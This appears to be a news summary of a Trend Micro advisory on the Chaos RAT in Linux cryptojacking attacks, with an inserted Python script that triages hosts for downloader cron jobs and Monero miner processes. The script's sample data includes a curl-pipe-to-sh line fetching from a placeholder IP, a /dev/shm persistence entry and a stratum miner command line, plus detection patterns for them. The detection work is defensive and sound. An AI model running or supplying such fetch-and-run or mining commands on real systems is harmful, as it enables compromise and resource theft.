Cybersecurity researchers from Trend Micro have uncovered a new threat targeting Linux systems in cryptocurrency mining attacks. The Chaos remote administration tool (RAT) has been identified as a key component in these attacks, as detailed in a recent advisory.
According to Trend Micro, the tactics used by threat actors in these attacks closely resemble those previously seen in cryptojacking scenarios targeting Linux machines and cloud computing instances. The attackers begin by attempting to eliminate competing malware, security products, and cloud middleware before establishing persistence and executing their payload, which often involves a Monero (XMR) cryptocurrency miner.
In a more recent discovery, Trend Micro intercepted a threat in November 2022 that incorporated the advanced RAT known as Chaos. This RAT, based on an open-source project, provides attackers with capabilities such as executing reverse shells, downloading and uploading files, and taking screenshots.
One notable aspect of the newly observed attacks is the distribution of the main downloader script and payloads across different locations to maintain campaign activity and spread. The main server used for downloading payloads in these attacks was traced back to Russia.
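The behaviours this summary attributes to the campaign (a downloader script fetched from a remote server, persistence on the host, and a Monero miner as the payload) are what a host-level triage would look for. The Python below is an added illustration, not code from Trend Micro or from the Chaos project: the cron and process listings it inspects are constructed samples, and the indicator patterns (pipe-to-shell downloaders, stratum pool URLs, miner-specific flags, binaries run from /tmp or /dev/shm) are generic heuristics assumed for the example rather than indicators taken from the advisory.

```python
"""
Host triage for the cryptojacking pattern described above: a remotely fetched
downloader, cron persistence, and a Monero (XMR) miner process.
All sample data is constructed; the indicator patterns are assumed generic
heuristics, not IoCs from the Trend Micro advisory.
"""
import re
from typing import Dict, List

# Constructed sample: output of `crontab -l` on a hypothetical host.
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://203.0.113.10/ldr.sh | sh
@reboot /dev/shm/.x/run >/dev/null 2>&1
"""

# Constructed sample: output of `ps -eo pid,user,pcpu,args` on the same host.
SAMPLE_PS = """\
  PID USER     %CPU COMMAND
    1 root      0.0 /sbin/init
  842 www-data  1.2 nginx: worker process
 1337 nobody   97.5 /dev/shm/.x/kworker -o stratum+tcp://203.0.113.20:3333 -u WALLET_PLACEHOLDER
 2001 root      0.3 sshd: /usr/sbin/sshd -D
"""

# Assumed downloader / persistence indicators for cron entries.
CRON_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"),  # fetch and pipe straight into a shell
    re.compile(r"base64\s+(-d|--decode)"),              # encoded second stage
    re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+"),    # binary launched from a scratch directory
]
# Assumed process-level indicators of an XMR miner.
PROC_PATTERNS = [
    re.compile(r"stratum\+(tcp|ssl)://"),               # mining-pool protocol in the arguments
    re.compile(r"\bxmrig\b", re.IGNORECASE),            # common open-source XMR miner name
    re.compile(r"--donate-level|--randomx"),            # miner-specific flags
]
CPU_THRESHOLD = 80.0  # a scratch-dir binary this busy is worth a look even without a name match


def flag_cron(cron_text: str) -> List[str]:
    """Return the cron lines that match a downloader or persistence indicator."""
    hits = []
    for line in cron_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if any(p.search(line) for p in CRON_PATTERNS):
            hits.append(line)
    return hits


def flag_processes(ps_text: str) -> List[Dict[str, object]]:
    """Return processes that look like miners, or that burn CPU from a scratch directory."""
    hits = []
    for line in ps_text.splitlines()[1:]:  # first line is the ps header
        parts = line.split(None, 3)        # pid, user, %cpu, then the full command line
        if len(parts) < 4:
            continue
        pid, user, cpu, cmd = parts
        cpu_val = float(cpu)
        miner_match = any(p.search(cmd) for p in PROC_PATTERNS)
        hot_scratch = cpu_val >= CPU_THRESHOLD and re.match(r"/(tmp|dev/shm|var/tmp)/", cmd) is not None
        if miner_match or hot_scratch:
            hits.append({"pid": int(pid), "user": user, "cpu": cpu_val, "cmd": cmd})
    return hits


def triage(cron_text: str, ps_text: str) -> Dict[str, object]:
    """Combine both checks into one findings record for the host."""
    return {"cron": flag_cron(cron_text), "processes": flag_processes(ps_text)}


if __name__ == "__main__":
    findings = triage(SAMPLE_CRON, SAMPLE_PS)
    for entry in findings["cron"]:
        print("suspicious cron entry:", entry)
    for proc in findings["processes"]:
        print("suspicious process: pid=%(pid)d user=%(user)s cpu=%(cpu).1f cmd=%(cmd)s" % proc)
```

On the constructed sample the script flags the two cron entries (the pipe-to-shell downloader and the /dev/shm launcher) and the one process talking to a stratum pool; the certbot job and the normal daemons pass. On a real host the same functions can be fed the live output of `crontab -l` and `ps -eo pid,user,pcpu,args`, and the pattern lists should be extended with whatever indicators your own telemetry supports.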
While incorporating a RAT into cryptocurrency mining malware may seem like a minor enhancement, Trend Micro emphasizes the importance of remaining vigilant in the face of evolving cloud-based threats. Organizations and individuals alike are urged to prioritize security measures to protect against such threats.
The Trend Micro advisory serves as a timely reminder of the ongoing cybersecurity challenges faced by the cryptocurrency industry. Just two months prior, decentralized finance platform Moola Market experienced a security incident resulting in the loss of up to $9 million worth of cryptocurrency. As threats continue to evolve, staying informed and implementing robust security practices are essential for safeguarding digital assets.